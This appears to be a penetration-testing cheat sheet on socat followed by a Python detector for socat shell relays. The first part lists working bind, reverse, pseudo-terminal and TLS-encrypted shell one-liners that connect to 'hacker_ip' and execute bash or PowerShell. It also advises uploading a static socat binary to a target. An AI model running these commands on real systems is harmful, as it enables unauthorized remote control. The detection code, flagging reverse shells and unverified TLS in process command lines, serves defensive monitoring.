socat
socat is a command similar to netcat. Like other such relay tools, it can act as either client or server, but with socat you will usually run socat on both sides.
➡️ Add -d -d for debug information.
🔥 socat is most likely not present on the target, so upload a statically linked socat binary.
TCP shell - stdin
Linux server
$ socat TCP-L:port -
$ socat TCP-LISTEN:port STDIO # same: "-" is shorthand for STDIO (STDOUT alone would only write, never read your input)
Linux/Windows Client
$ socat TCP:hacker_ip:port EXEC:"bash -li"
PS> socat TCP:hacker_ip:port EXEC:powershell.exe,pipes
TCP shell - tty
Linux server
$ socat TCP-L:port FILE:`tty`,raw,echo=0
Linux client
$ socat TCP:hacker_ip:port EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Encrypted shell 🔥
You first need to generate a certificate:
$ openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
$ cat shell.key shell.crt > shell.pem
Linux server
$ socat OPENSSL-LISTEN:port,cert=shell.pem,verify=0 [...]
Linux client
$ socat OPENSSL:hacker_ip:port,verify=0 [...]
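The command lines above share a small set of socat address patterns: an EXEC/SYSTEM address paired with an outbound TCP/OPENSSL connect, pty/pipes/setsid options for an interactive tty, and OPENSSL with verify=0 on both ends (so neither side authenticates the other). The following is an added example, not part of the original cheat sheet, that parses socat address syntax and flags those patterns in process command lines (e.g. from ps output or an auditd EXECVE record). The sample command lines and the 203.0.113.x addresses are constructed; the finding names are this example's own.

```python
import shlex

# socat address types that hand the connection to a local program
PROGRAM_TYPES = {"EXEC", "SYSTEM"}
# address types that open an outbound connection to a remote peer
CONNECT_TYPES = {"TCP", "TCP4", "TCP6", "OPENSSL", "SSL", "UDP", "UDP4", "UDP6"}
LISTEN_TYPES = {"TCP-L", "TCP-LISTEN", "TCP4-LISTEN", "TCP6-LISTEN",
                "OPENSSL-LISTEN", "SSL-L", "SSL-LISTEN", "UDP-LISTEN"}
TLS_TYPES = {"OPENSSL", "SSL", "OPENSSL-LISTEN", "SSL-L", "SSL-LISTEN"}
# options that indicate an interactive terminal is being wired up
TTY_OPTIONS = {"pty", "pipes", "setsid", "sane", "raw"}

# Constructed sample command lines (not real captures).
SAMPLE_CMDLINES = [
    "/usr/bin/socat TCP-LISTEN:4444 -",
    "/tmp/socat TCP:203.0.113.10:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane",
    "socat -d -d OPENSSL:203.0.113.10:443,verify=0 EXEC:/bin/sh",
    "socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0",
    "/usr/bin/socat TCP-LISTEN:8080,fork TCP:10.0.0.5:80",  # plain port forward
    "nginx: worker process",
]


def parse_address(spec):
    """Split one socat address ("TYPE:target,opt,opt=val") into (TYPE, target, {opt: val})."""
    if spec == "-":                      # "-" is socat shorthand for STDIO
        spec = "STDIO"
    kind, sep, rest = spec.partition(":")
    if not sep:                          # keyword address such as STDIO or STDOUT,ignoreeof
        kind, _, rest = spec.partition(",")
        fields = [""] + (rest.split(",") if rest else [])
    else:
        fields = rest.split(",")
    target, options = fields[0], fields[1:]
    opts = {}
    for option in options:
        name, _, value = option.partition("=")
        opts[name] = value if value else None
    return kind.upper(), target, opts


def classify(cmdline):
    """Return a set of finding names for one process command line (empty if not a socat relay)."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                   # unbalanced quotes: not parseable, not flagged
        return set()
    idx = next((i for i, a in enumerate(argv) if a.rsplit("/", 1)[-1] == "socat"), None)
    if idx is None:
        return set()
    # socat's own switches (-d, -v, ...) start with "-"; the two addresses are the last
    # positional arguments. A lone "-" is an address, not a switch.
    positional = [a for a in argv[idx + 1:] if a == "-" or not a.startswith("-")]
    if len(positional) < 2:
        return set()
    addrs = [parse_address(a) for a in positional[-2:]]
    kinds = {kind for kind, _, _ in addrs}
    findings = set()
    if kinds & PROGRAM_TYPES:
        findings.add("spawns-program")
    if kinds & LISTEN_TYPES:
        findings.add("listener")
    if kinds & CONNECT_TYPES and kinds & PROGRAM_TYPES:
        findings.add("reverse-shell")    # outbound connection handed to a local program
    if kinds & LISTEN_TYPES and kinds & PROGRAM_TYPES:
        findings.add("bind-shell")       # inbound listener handed to a local program
    for kind, target, opts in addrs:
        if TTY_OPTIONS.intersection(opts) or (kind == "FILE" and target.strip("`") == "tty"):
            findings.add("interactive-tty")
        if kind in TLS_TYPES and opts.get("verify") == "0":
            findings.add("tls-unverified")  # certificate checking disabled on this end
    return findings


def scan(cmdlines):
    """Run classify over many command lines; return [(cmdline, sorted findings)] for hits only."""
    hits = []
    for line in cmdlines:
        found = classify(line)
        if found:
            hits.append((line, sorted(found)))
    return hits


if __name__ == "__main__":
    for line, found in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(found):45} {line}")
```

A plain port forward (the fifth sample) only yields "listener", so alerting on "spawns-program" together with "reverse-shell" or "bind-shell" separates shell relays from legitimate socat use; "tls-unverified" on a listener side shows the OPENSSL-LISTEN pattern from this page.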